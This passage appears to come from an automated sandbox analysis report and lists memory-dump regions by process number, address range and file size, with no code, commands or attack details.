                                                                                      • memory/2952-202-0x000007FEF1C30000-0x000007FEF2CC6000-memory.dmp
                                                                                        Filesize

                                                                                        16.6MB

                                                                                      • memory/2984-307-0x0000000000480000-0x0000000000481000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3000-203-0x0000000000000000-mapping.dmp
                                                                                      • memory/3044-225-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3044-215-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3044-204-0x0000000000000000-mapping.dmp
                                                                                      • memory/3044-226-0x00000000006C0000-0x00000000006C2000-memory.dmp
                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/3056-240-0x0000000000000000-mapping.dmp
                                                                                      • memory/3080-300-0x0000000004822000-0x0000000004823000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3080-299-0x0000000004820000-0x0000000004821000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3108-315-0x0000000000070000-0x0000000000079000-memory.dmp
                                                                                        Filesize

                                                                                        36KB

                                                                                      • memory/3176-290-0x00000000048E2000-0x00000000048E3000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3176-289-0x00000000048E0000-0x00000000048E1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3264-259-0x0000000000000000-mapping.dmp
                                                                                      • memory/3296-260-0x0000000000000000-mapping.dmp
                                                                                      • memory/3376-269-0x00000000003F0000-0x00000000003F1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-285-0x00000000060C0000-0x00000000060C1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-276-0x00000000048A2000-0x00000000048A3000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-270-0x00000000048E0000-0x00000000048E1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-275-0x00000000048A0000-0x00000000048A1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-280-0x0000000004870000-0x0000000004871000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-262-0x0000000000000000-mapping.dmp
                                                                                      • memory/3376-287-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3376-277-0x00000000022D0000-0x00000000022D1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3392-263-0x0000000000000000-mapping.dmp
                                                                                      • memory/3452-273-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                        Filesize

                                                                                        48KB

                                                                                      • memory/3452-265-0x0000000000000000-mapping.dmp
                                                                                      • memory/3500-292-0x0000000004A02000-0x0000000004A03000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3500-291-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3536-267-0x0000000000402F68-mapping.dmp
                                                                                      • memory/3536-266-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                        Filesize

                                                                                        48KB

                                                                                      • memory/3580-271-0x0000000000000000-mapping.dmp
                                                                                      • memory/3672-278-0x0000000000000000-mapping.dmp
                                                                                      • memory/3684-301-0x0000000007280000-0x0000000007281000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3708-279-0x0000000000000000-mapping.dmp
                                                                                      • memory/3836-295-0x00000000049C0000-0x00000000049C1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3836-296-0x00000000049C2000-0x00000000049C3000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3840-281-0x0000000000000000-mapping.dmp
                                                                                      • memory/3868-282-0x0000000000000000-mapping.dmp
                                                                                      • memory/3968-304-0x0000000004EB0000-0x0000000004EB1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4080-309-0x0000000000080000-0x00000000000EB000-memory.dmp
                                                                                        Filesize

                                                                                        428KB

                                                                                      • memory/4080-308-0x00000000001D0000-0x0000000000244000-memory.dmp
                                                                                        Filesize

                                                                                        464KB